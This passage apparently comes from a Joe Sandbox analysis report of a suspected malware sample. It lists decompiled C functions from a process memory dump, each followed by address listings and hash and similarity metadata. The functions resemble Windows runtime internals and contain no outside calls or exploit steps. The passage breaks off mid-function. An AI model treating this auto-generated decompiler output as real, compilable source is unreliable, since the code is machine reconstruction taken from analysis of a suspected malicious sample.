				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E010652A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010A95D0();
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0107EB70(_t54, 0x11579a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E010A95D0();
								L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0107EB70(_t54, 0x11579a0);
						}
						return _t52;
					}
					L5:
					_t33 = E010AF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0107EB70(_t54, 0x11579a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010A95D0();
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                                                            0x01065220
                                                                                                            0x01065224
                                                                                                            0x010c0d13
                                                                                                            0x010c0d16
                                                                                                            0x010c0d19
                                                                                                            0x0106522a
                                                                                                            0x0106522a
                                                                                                            0x0106522d
                                                                                                            0x0106522d
                                                                                                            0x01065231
                                                                                                            0x01065235
                                                                                                            0x01065239
                                                                                                            0x010c0d5c
                                                                                                            0x010c0d62
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c0d6a
                                                                                                            0x010c0d7b
                                                                                                            0x010c0d7f
                                                                                                            0x010c0d81
                                                                                                            0x010c0d84
                                                                                                            0x010c0d95
                                                                                                            0x010c0d95
                                                                                                            0x010c0d6c
                                                                                                            0x010c0d71
                                                                                                            0x010c0d71
                                                                                                            0x010c0d9a
                                                                                                            0x00000000
                                                                                                            0x0106524a
                                                                                                            0x0106524a
                                                                                                            0x01065250
                                                                                                            0x010c0d24
                                                                                                            0x010c0d35
                                                                                                            0x010c0d39
                                                                                                            0x010c0d3b
                                                                                                            0x010c0d3e
                                                                                                            0x010c0d50
                                                                                                            0x010c0d50
                                                                                                            0x010c0d26
                                                                                                            0x010c0d2b
                                                                                                            0x010c0d2b
                                                                                                            0x00000000
                                                                                                            0x010c0d55
                                                                                                            0x01065256
                                                                                                            0x0106525b
                                                                                                            0x01065265
                                                                                                            0x010c0da7
                                                                                                            0x0106526b
                                                                                                            0x0106526e
                                                                                                            0x01065272
                                                                                                            0x010c0db1
                                                                                                            0x010c0db4
                                                                                                            0x010c0dc5
                                                                                                            0x010c0dc5
                                                                                                            0x01065272
                                                                                                            0x01065278
                                                                                                            0x0106527e
                                                                                                            0x0106528a
                                                                                                            0x0106528c
                                                                                                            0x0106528d
                                                                                                            0x00000000
                                                                                                            0x01065280
                                                                                                            0x01065282
                                                                                                            0x01065288
                                                                                                            0x0106529f
                                                                                                            0x01065292
                                                                                                            0x00000000
                                                                                                            0x01065292
                                                                                                            0x00000000
                                                                                                            0x01065288
                                                                                                            0x0106527e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 922458eca71c27772dc8c8556babb1ec6d3d66a745bd6edb9fc7063cfe4e7d57
                                                                                                            • Instruction ID: e2e7ff1292b2d9bbfa605880a657a85afeab29cdc7a39a609b2d77637814aa51
                                                                                                            • Opcode Fuzzy Hash: 922458eca71c27772dc8c8556babb1ec6d3d66a745bd6edb9fc7063cfe4e7d57
                                                                                                            • Instruction Fuzzy Hash: A2310831641602DBC766BB28CC81BAE7BA9FF50B60F11465EF9D50B1A4EB70E800CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A3D43 Relevance: .1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E010A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01077B60(0, _t61, 0x10411c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01077B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01084620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                                                            0x010a3d4c
                                                                                                            0x010a3d50
                                                                                                            0x010a3d55
                                                                                                            0x010a3d5e
                                                                                                            0x010de79a
                                                                                                            0x00000000
                                                                                                            0x010de79a
                                                                                                            0x010a3d68
                                                                                                            0x010de789
                                                                                                            0x010a3d9d
                                                                                                            0x010a3da3
                                                                                                            0x010a3daf
                                                                                                            0x010a3db5
                                                                                                            0x010a3dbc
                                                                                                            0x010a3dc4
                                                                                                            0x010a3dc9
                                                                                                            0x010a3dce
                                                                                                            0x010de7ae
                                                                                                            0x010de7ae
                                                                                                            0x010a3dde
                                                                                                            0x010a3de2
                                                                                                            0x010a3de7
                                                                                                            0x010a3e0d
                                                                                                            0x010a3e13
                                                                                                            0x010a3e16
                                                                                                            0x010a3e1e
                                                                                                            0x010a3e25
                                                                                                            0x010a3e28
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010a3e2a
                                                                                                            0x010a3e2f
                                                                                                            0x010a3e37
                                                                                                            0x010a3e37
                                                                                                            0x00000000
                                                                                                            0x010a3e37
                                                                                                            0x010a3e31
                                                                                                            0x00000000
                                                                                                            0x010a3e31
                                                                                                            0x010a3e20
                                                                                                            0x010a3e20
                                                                                                            0x010a3e35
                                                                                                            0x00000000
                                                                                                            0x010a3de9
                                                                                                            0x010a3de9
                                                                                                            0x010a3de9
                                                                                                            0x010a3dee
                                                                                                            0x010a3dfd
                                                                                                            0x010a3dff
                                                                                                            0x010a3e02
                                                                                                            0x010a3e05
                                                                                                            0x010a3e05
                                                                                                            0x00000000
                                                                                                            0x010a3df0
                                                                                                            0x010a3de7
                                                                                                            0x010de78f
                                                                                                            0x010de794
                                                                                                            0x010a3d79
                                                                                                            0x010a3d84
                                                                                                            0x010a3d89
                                                                                                            0x010a3d8e
                                                                                                            0x00000000
                                                                                                            0x010de7a4
                                                                                                            0x010a3d96
                                                                                                            0x010a3d9a
                                                                                                            0x00000000
                                                                                                            0x010a3d9a
                                                                                                            0x00000000
                                                                                                            0x010de794
                                                                                                            0x010a3d6e
                                                                                                            0x010a3d73
                                                                                                            0x00000000
                                                                                                            0x010de7b5
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 45d12f5be14866452d30bf7de8b63d9d8004a74e2b5bfcd63ab135316484e664
                                                                                                            • Instruction ID: 8120c6576c382a01fdd3d97e60e4411f92225c7d59243525443dbd80f2872428
                                                                                                            • Opcode Fuzzy Hash: 45d12f5be14866452d30bf7de8b63d9d8004a74e2b5bfcd63ab135316484e664
                                                                                                            • Instruction Fuzzy Hash: B931CD31A00611DBD765DFADE841A7ABBE4FF45700B4680AAE98ACF390E730D840C790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0109A61C Relevance: .1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E0109A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1140220);
				E010BD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1157b9c; // 0x0
				_t55 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E010BD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1157b10 =  *0x1157b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x115536c; // 0x77495368
					if( *_t51 != 0x1155368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1155368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x115536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0109A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                                                                                            0x0109a61c
                                                                                                            0x0109a61e
                                                                                                            0x0109a623
                                                                                                            0x0109a628
                                                                                                            0x0109a62b
                                                                                                            0x0109a62d
                                                                                                            0x0109a648
                                                                                                            0x0109a64a
                                                                                                            0x0109a64f
                                                                                                            0x010d9b44
                                                                                                            0x0109a6ec
                                                                                                            0x0109a6f1
                                                                                                            0x0109a6f1
                                                                                                            0x0109a655
                                                                                                            0x0109a657
                                                                                                            0x0109a65a
                                                                                                            0x0109a65d
                                                                                                            0x0109a662
                                                                                                            0x0109a663
                                                                                                            0x0109a667
                                                                                                            0x0109a668
                                                                                                            0x0109a66d
                                                                                                            0x0109a706
                                                                                                            0x0109a706
                                                                                                            0x010d9bda
                                                                                                            0x010d9be6
                                                                                                            0x010d9beb
                                                                                                            0x00000000
                                                                                                            0x010d9beb
                                                                                                            0x0109a679
                                                                                                            0x010d9b7a
                                                                                                            0x00000000
                                                                                                            0x010d9b7a
                                                                                                            0x0109a683
                                                                                                            0x0109a6f4
                                                                                                            0x0109a6f7
                                                                                                            0x0109a6f9
                                                                                                            0x0109a6fd
                                                                                                            0x0109a6a0
                                                                                                            0x0109a6a0
                                                                                                            0x0109a6ad
                                                                                                            0x0109a6af
                                                                                                            0x0109a6b4
                                                                                                            0x010d9ba7
                                                                                                            0x010d9bac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d9bc6
                                                                                                            0x010d9bce
                                                                                                            0x010d9bd1
                                                                                                            0x010d9bd3
                                                                                                            0x010d9bd3
                                                                                                            0x00000000
                                                                                                            0x010d9bd1
                                                                                                            0x0109a6bd
                                                                                                            0x0109a6c3
                                                                                                            0x0109a6c6
                                                                                                            0x0109a6d2
                                                                                                            0x0109a701
                                                                                                            0x0109a704
                                                                                                            0x00000000
                                                                                                            0x0109a704
                                                                                                            0x0109a6d4
                                                                                                            0x0109a6d6
                                                                                                            0x0109a6d9
                                                                                                            0x0109a6db
                                                                                                            0x0109a6e1
                                                                                                            0x0109a6e6
                                                                                                            0x0109a6e8
                                                                                                            0x0109a6e8
                                                                                                            0x0109a6ea
                                                                                                            0x00000000
                                                                                                            0x0109a6ea
                                                                                                            0x0109a688
                                                                                                            0x0109a692
                                                                                                            0x0109a694
                                                                                                            0x0109a699
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0109a69d
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 10d0b4644fc490368e77fe09112e2c50005cba5dec4750df822600a0f61760ad
                                                                                                            • Instruction ID: aed5b524d4b0a948e9646458f5b8309811da00d5671ac0592156926363be3f23
                                                                                                            • Opcode Fuzzy Hash: 10d0b4644fc490368e77fe09112e2c50005cba5dec4750df822600a0f61760ad
                                                                                                            • Instruction Fuzzy Hash: 7E4198B5A00315DFCF58CF58C990B9DBBF2FB89314F1980A9E959AB384C774A941CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108C182 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E0108C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01087D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01138D34(_v8, _t80);
					}
					E01082280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0107FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01138833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0107FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E010AB180();
						if(_a4 != 0) {
							E01082280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0108BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0108BB2D(_t16, _t15);
						E0108B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0107FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0107FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0107FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                                                            0x0108c18d
                                                                                                            0x0108c18f
                                                                                                            0x0108c191
                                                                                                            0x0108c19b
                                                                                                            0x0108c1a0
                                                                                                            0x0108c1d4
                                                                                                            0x0108c1de
                                                                                                            0x010d2d6e
                                                                                                            0x0108c1e4
                                                                                                            0x0108c1e4
                                                                                                            0x0108c1e4
                                                                                                            0x0108c1ec
                                                                                                            0x010d2d7d
                                                                                                            0x010d2d7d
                                                                                                            0x0108c1f3
                                                                                                            0x0108c1ff
                                                                                                            0x010d2d88
                                                                                                            0x010d2d8d
                                                                                                            0x010d2d94
                                                                                                            0x010d2d94
                                                                                                            0x010d2d9f
                                                                                                            0x010d2da4
                                                                                                            0x010d2dab
                                                                                                            0x010d2db0
                                                                                                            0x010d2db2
                                                                                                            0x010d2db3
                                                                                                            0x010d2db4
                                                                                                            0x010d2dbc
                                                                                                            0x010d2dc3
                                                                                                            0x010d2dc3
                                                                                                            0x0108c205
                                                                                                            0x0108c205
                                                                                                            0x0108c208
                                                                                                            0x0108c20e
                                                                                                            0x0108c211
                                                                                                            0x0108c216
                                                                                                            0x0108c219
                                                                                                            0x0108c21f
                                                                                                            0x0108c222
                                                                                                            0x0108c22c
                                                                                                            0x0108c234
                                                                                                            0x0108c23a
                                                                                                            0x0108c23f
                                                                                                            0x0108c245
                                                                                                            0x0108c24b
                                                                                                            0x0108c251
                                                                                                            0x0108c25a
                                                                                                            0x0108c276
                                                                                                            0x0108c27d
                                                                                                            0x0108c27d
                                                                                                            0x0108c25c
                                                                                                            0x0108c25c
                                                                                                            0x00000000
                                                                                                            0x0108c25e
                                                                                                            0x0108c1a4
                                                                                                            0x0108c1aa
                                                                                                            0x0108c1b3
                                                                                                            0x0108c265
                                                                                                            0x0108c26c
                                                                                                            0x0108c26c
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                            • Instruction ID: 88dfa9cc575b21e326b4969ff47b900c4dee607f39079484079167f2b892edc8
                                                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                            • Instruction Fuzzy Hash: 80314871A09687BEEB45FBB4C580BEDFBA4BF52204F04419AD4DC47241DB346A05C7E0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010E7016 Relevance: .1, Instructions: 104COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 76%
                                                                                                            			E010E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x115d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E010E6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E010E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01087D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E010A9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E010AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01084620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                            0x010e7016
                                                                                                            0x010e701e
                                                                                                            0x010e702b
                                                                                                            0x010e7033
                                                                                                            0x010e7037
                                                                                                            0x010e703c
                                                                                                            0x010e703e
                                                                                                            0x010e7041
                                                                                                            0x010e7045
                                                                                                            0x010e704a
                                                                                                            0x010e7050
                                                                                                            0x010e7055
                                                                                                            0x010e705a
                                                                                                            0x010e7062
                                                                                                            0x010e7062
                                                                                                            0x010e705a
                                                                                                            0x010e7064
                                                                                                            0x010e7064
                                                                                                            0x010e7067
                                                                                                            0x010e7071
                                                                                                            0x010e7096
                                                                                                            0x010e709b
                                                                                                            0x010e70a2
                                                                                                            0x010e70a6
                                                                                                            0x010e70a7
                                                                                                            0x010e70ad
                                                                                                            0x010e70b3
                                                                                                            0x010e70b6
                                                                                                            0x010e70bb
                                                                                                            0x010e70c3
                                                                                                            0x010e70c3
                                                                                                            0x010e70c6
                                                                                                            0x010e70cd
                                                                                                            0x010e70dd
                                                                                                            0x010e70e0
                                                                                                            0x010e70e2
                                                                                                            0x010e70e2
                                                                                                            0x010e70ee
                                                                                                            0x010e7101
                                                                                                            0x010e70f0
                                                                                                            0x010e70f9
                                                                                                            0x010e70f9
                                                                                                            0x010e710a
                                                                                                            0x010e710e
                                                                                                            0x010e7112
                                                                                                            0x010e7117
                                                                                                            0x010e7118
                                                                                                            0x010e7118
                                                                                                            0x010e70bb
                                                                                                            0x010e711d
                                                                                                            0x010e7123
                                                                                                            0x010e7131
                                                                                                            0x010e7131
                                                                                                            0x010e7136
                                                                                                            0x010e713d
                                                                                                            0x010e713e
                                                                                                            0x010e713f
                                                                                                            0x010e714a
                                                                                                            0x010e714a
                                                                                                            0x010e7084
                                                                                                            0x010e7088
                                                                                                            0x00000000
                                                                                                            0x010e708e
                                                                                                            0x010e708e
                                                                                                            0x010e7092
                                                                                                            0x00000000
                                                                                                            0x010e7092

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1a276b01b1881d48786ca820a57597900652c5f45372715de89b649906e92d72
                                                                                                            • Instruction ID: 6361a66fe7fd6589f23311074e4461436681fd8da277c3c417c8892887082f1f
                                                                                                            • Opcode Fuzzy Hash: 1a276b01b1881d48786ca820a57597900652c5f45372715de89b649906e92d72
                                                                                                            • Instruction Fuzzy Hash: 3F31B1726087519FC320DF6DC944AAAB7E9BFD8600F044A69F9E587690E730E904C7E6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01113D40 Relevance: .1, Instructions: 98COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E01113D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x115d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01082280(_t34, 0x1158a6c);
